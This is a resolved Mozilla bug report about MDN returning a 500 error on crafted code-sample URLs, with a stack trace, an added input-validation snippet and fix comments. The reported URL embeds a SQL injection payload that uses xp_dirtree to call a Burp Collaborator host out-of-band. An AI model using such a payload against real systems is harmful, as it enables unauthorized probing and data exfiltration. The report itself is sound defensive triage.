500 ISE on some values for $samples

RESOLVED FIXED

Status

developer.mozilla.org
Security
2 years ago
2 years ago

People

(Reporter: jwhitlock, Assigned: rjohnson)

Tracking

Details

(Whiteboard: [specification][type:bug])

(Reporter)

Description

2 years ago
What did you do?
================
A user intentionally or accidentally crafted a URL:

https://mdn.mozillademos.org/en-US/docs/IndexedDB/Using_IndexedDB$samples/Full_IndexedDB_example%3Bdeclare%20@q%20varchar(99)%3Bset%20@q%3D'%5C%5C0opnfoykgtyvofgudak3gu07nytphg74ywlm9b.burpcollab'+'orator.net%5Cxrt'%3B%20exec%20master.dbo.xp_dirtree%20@q%3B--%20?key-to-delete=555-555-0199@example.com&pub-biblioid-to-delete=555-555-0199@example.com"



What happened?
==============
A 500 error occurs when the URL is visited.

What should have happened?
==========================
A 400 Bad Request or other is returned.

Is there anything else we should know?
======================================
Stack trace:

ValueError: All strings must be XML compatible: Unicode or ASCII, no NULL bytes or control characters
  File "django/core/handlers/base.py", line 132, in get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "newrelic/hooks/framework_django.py", line 499, in wrapper
    return wrapped(*args, **kwargs)
  File "django/views/decorators/http.py", line 45, in inner
    return func(request, *args, **kwargs)
  File "kuma/wiki/decorators.py", line 31, in _added_header
    response = func(request, *args, **kwargs)
  File "django/views/decorators/clickjacking.py", line 61, in wrapped_view
    resp = view_func(*args, **kwargs)
  File "kuma/wiki/decorators.py", line 106, in process
    return func(request, *args, **kwargs)
  File "kuma/wiki/views/code.py", line 34, in code_sample
    data = job.get(document.pk, sample_name)
  File "cacheback/base.py", line 112, in get
    result = self.refresh(*args, **kwargs)
  File "cacheback/base.py", line 226, in refresh
    result = self.fetch(*args, **kwargs)
  File "kuma/wiki/jobs.py", line 112, in fetch
    return document.extract.code_sample(sample_name)
  File "newrelic/api/function_trace.py", line 110, in literal_wrapper
    return wrapped(*args, **kwargs)
  File "kuma/wiki/content.py", line 143, in code_sample
    sample = pq(src).find('[id="%s"]' % name)
  File "pyquery/pyquery.py", line 647, in find
    for child in tag.getchildren()]
  File "src/lxml/lxml.etree.pyx", line 1587, in lxml.etree._Element.xpath (src/lxml/lxml.etree.c:61854)
  File "src/lxml/xpath.pxi", line 295, in lxml.etree.XPathElementEvaluator.__call__ (src/lxml/lxml.etree.c:178374)
  File "src/lxml/apihelpers.pxi", line 1439, in lxml.etree._utf8 (src/lxml/lxml.etree.c:32441)
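
Added example, not part of the bug report and not Kuma's code: the trace shows the URL-supplied sample name interpolated into `'[id="%s"]' % name` before lxml rejects it, so one defensive pattern is to validate the name first and answer 400 instead of an unhandled 500. The length limit, the rejected character sets and all function names are assumptions; the page does not show the fix that was actually deployed.

```python
import re
from urllib.parse import unquote

MAX_LEN = 128  # assumed upper bound for a sample id
# Code points XML 1.0 forbids; the ValueError in the trace is lxml refusing them.
XML_FORBIDDEN = re.compile("[\x00-\x08\x0b\x0c\x0e-\x1f\ufffe\uffff]")
# Characters that carry meaning inside a quoted CSS attribute value.
SELECTOR_META = re.compile(r'["\'\\\[\]\r\n]')


def reject_reason(name):
    """Return why a sample name is refused, or None if it is acceptable."""
    if not name or len(name) > MAX_LEN:
        return "length"
    if XML_FORBIDDEN.search(name):
        return "xml-incompatible"
    if SELECTOR_META.search(name):
        return "selector-metacharacter"
    return None


def sample_selector(name):
    """Build the [id="..."] selector only for names that passed validation."""
    reason = reject_reason(name)
    if reason is not None:
        raise ValueError("bad sample name: " + reason)
    return '[id="%s"]' % name


def status_for(path_segment):
    """Hypothetical view glue: a refused name becomes 400, not an unhandled 500."""
    try:
        sample_selector(unquote(path_segment))
    except ValueError:
        return 400
    return 200


if __name__ == "__main__":
    # Constructed path segments, not taken from the report.
    for seg in ("Full_IndexedDB_example", "Full_IndexedDB_example%5C%5C0abc", "x%00"):
        print(seg, status_for(seg))
```
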
(Assignee)

Updated

2 years ago
Assignee: nobody → rjohnson
(Assignee)

Comment 2

2 years ago
Deployed to staging and production.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → FIXED
(Reporter)

Comment 3

2 years ago
The second URL now returns an empty response, but the original URL still raises a 500 error.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
(Reporter)

Comment 4

2 years ago
Both URLs now return empty responses.
Status: REOPENED → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → FIXED
(Reporter)

Comment 5

2 years ago
The test string implies that this security testing suite was used to generate the URL:

https://portswigger.net/burp/help/collaborator.html
(Reporter)

Comment 6

2 years ago
Fix deployed to production, removing security flag.
Group: websites-security